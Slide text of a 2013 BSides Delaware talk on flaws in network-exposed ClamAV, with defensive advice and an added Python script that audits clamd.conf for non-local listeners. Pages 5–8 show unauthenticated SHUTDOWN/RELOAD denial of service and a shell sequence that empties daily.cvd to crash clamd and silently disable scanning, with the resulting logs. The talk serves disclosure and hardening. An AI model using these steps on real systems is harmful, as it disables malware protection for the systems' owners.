
Baking even more Clam(AV)s for Fun & Profit


Security BSides Delaware BSidesDE 2013 Track 1 November 9th 2013 13:00


Page 1: Baking even more Clam(AV)s for Fun & Profit

Baking even more Clam(AV)s for Fun & Profit.

ClamAV in a network accessible configuration provides not only remote virus scanning, but also the potential for DOS, etc.

Page 2: Baking even more Clam(AV)s for Fun & Profit

ClamAV - what it is.

Open Source Software
Provides Virus Scanning
Currently owned by Sourcefire / Cisco Systems

Page 3: Baking even more Clam(AV)s for Fun & Profit

ClamAV - Component Overview / What it does.

clamscan - cmd line scanner, stand alone
freshclam - Signature DB update tool
clamd - Scanning Server

Scanning clients:
clamdscan - cmd line scanner
clamav-milter - email scanning plugin

Page 4: Baking even more Clam(AV)s for Fun & Profit

The Design Problems - In Theory

Configuration: Clamd can bind to an IP address
No Access Controls
No Authentication
No connection logging
Malformed DB Handling

Page 5: Baking even more Clam(AV)s for Fun & Profit

The Implementation Problems - In Practice

Availability of Administrative Commands.

VERSION - Recon & Information disclosure
RELOAD - Default Virus DB size is about 74 MB. Continuous reloads result in High CPU utilization.
SHUTDOWN - Guess what that does? :-) A DOS of a networked ClamAV installation.

Discussed on ClamAV-user mailing list July 22-23 2011

Page 6: Baking even more Clam(AV)s for Fun & Profit

Bug 2727 - Use in Post Exploitation

clamconf | grep "DatabaseDirectory"
DatabaseDirectory = "/usr/local/share/clamav"
DatabaseDirectory = "/usr/local/share/clamav"
cd /usr/local/share/clamav
ls -lh *.cvd
-rw-r--r-- 1 clamav clamav 66K Oct 19 01:08 bytecode.cvd
-rw-r--r-- 1 clamav clamav 12M Nov 4 18:27 daily.cvd
-rw-r--r-- 1 clamav clamav 62M Oct 19 01:07 main.cvd
echo -n "" > daily.cvd
ls -lh *.cvd
-rw-r--r-- 1 clamav clamav 66K Oct 19 01:08 bytecode.cvd
-rw-r--r-- 1 clamav clamav 0 Nov 4 18:41 daily.cvd
-rw-r--r-- 1 clamav clamav 62M Oct 19 01:07 main.cvd

Page 7: Baking even more Clam(AV)s for Fun & Profit

Bug 2727 - Use in Post Exploitation - Cont'd

Nov 4 18:43:50 host clamd[24481]: Reading databases from /usr/local/share/clamav
Nov 4 18:43:50 host clamd[24481]: reload db failed: Broken or not a CVD file
Nov 4 18:43:50 host clamd[24481]: Terminating because of a fatal error.
Nov 4 18:43:50 host clamd[24481]: Waiting for all threads to finish
Nov 4 18:43:50 host clamd[24481]: Shutting down the main sockets.
Nov 4 18:43:50 host clamd[24481]: Pid file removed.
Nov 4 18:43:50 host clamd[24481]: --- Stopped at Mon Nov 4 18:43:50 2013
Nov 4 18:43:50 host clamd[24481]: Closing the main sockets.
Nov 4 18:43:50 host clamd[24481]: Socket file removed.

Page 8: Baking even more Clam(AV)s for Fun & Profit

Operational Impact

clamdscan -m /
ERROR: Can't connect to clamd: No such file or directory

----------- SCAN SUMMARY -----------
Infected files: 0
Total errors: 1
Time: 0.000 sec (0 m 0 s)

Page 9: Baking even more Clam(AV)s for Fun & Profit

The Defense

Configuration: Bind to a LOCAL Socket, or bind to the loopback interface
Access Controls - FIREWALL
FIX THE BUGS! - Just Saying... :-)
Monitoring
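A small audit script for the configuration point on this slide, added here as an example (not part of the talk or of the ClamAV project): it parses a clamd.conf and flags the network-exposed binding the slides warn about. The directive names TCPSocket, TCPAddr and LocalSocket are real clamd.conf keys; the two sample configs are constructed for the example.

```python
"""Audit a clamd.conf for the network-exposure problem the slides describe."""
import ipaddress


def parse_clamd_conf(text):
    """Return {directive: [values]} for the non-comment lines of a clamd.conf."""
    conf = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 1)
        value = parts[1].strip() if len(parts) > 1 else ""
        conf.setdefault(parts[0], []).append(value)
    return conf


def is_loopback(addr):
    """True for 127.0.0.0/8, ::1 or the name 'localhost'."""
    try:
        return ipaddress.ip_address(addr).is_loopback
    except ValueError:
        return addr.lower() == "localhost"


def audit(text):
    """Return a list of findings; an empty list means no non-local listener."""
    conf = parse_clamd_conf(text)
    findings = []
    if "TCPSocket" in conf:
        addrs = conf.get("TCPAddr", [])
        if not addrs:
            # Without TCPAddr, clamd listens on all interfaces: anyone who can
            # reach the port can issue VERSION, RELOAD or SHUTDOWN unauthenticated.
            findings.append("TCPSocket set without TCPAddr: clamd binds all interfaces")
        for addr in addrs:
            if not is_loopback(addr):
                findings.append(f"TCPAddr {addr} is not a loopback address")
    return findings


# Constructed samples: the weak setting beside the corrected one.
EXPOSED_CONF = """# constructed sample: network-accessible clamd
LogFile /var/log/clamav/clamd.log
TCPSocket 3310
TCPAddr 0.0.0.0
"""
HARDENED_CONF = """# constructed sample: local-only clamd
LogFile /var/log/clamav/clamd.log
LocalSocket /var/run/clamav/clamd.sock
TCPSocket 3310
TCPAddr 127.0.0.1
"""
```

A loopback-bound TCP listener is still reachable by every local process, since clamd has no authentication; a LocalSocket protected by filesystem permissions is the tighter of the two options listed on the slide.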

Page 10: Baking even more Clam(AV)s for Fun & Profit

Tools - Shameless Plugs: Clambake

Clambake 0.2
Enumeration
"Stress" testing
Networked ClamAV DOS capabilities.

Page 11: Baking even more Clam(AV)s for Fun & Profit

Tools - Continued bragging: CCEE

CCEE 0.97.4
Initially a patch for bug 1754
Adds connection logging to clamd for administrative commands
Adds other functionality to ClamAV
Woefully Outdated

I am NOT a real C coder. I DO have other things to do. :-)

Page 12: Baking even more Clam(AV)s for Fun & Profit

Tools - Continued: Is he done yet? -- Almost. :-)

clamd.monitor
Monitor plugin for the mon framework
Can be used as a stand alone solution

Get them all and more at http://www.cmpublishers.com/oss

Page 13: Baking even more Clam(AV)s for Fun & Profit

Contact Info

Email: [email protected]
Twitter: @Christ_Media
LinkedIn: http://www.linkedin.com/in/nategibbs
Slideshare: http://www.slideshare.net/NathanGibbs3

Page 14: Baking even more Clam(AV)s for Fun & Profit

Thanks

Jesus Christ
BSides DE
ClamAV Dev Team, Sourcefire, & Cisco
Folks on Clamav-users ML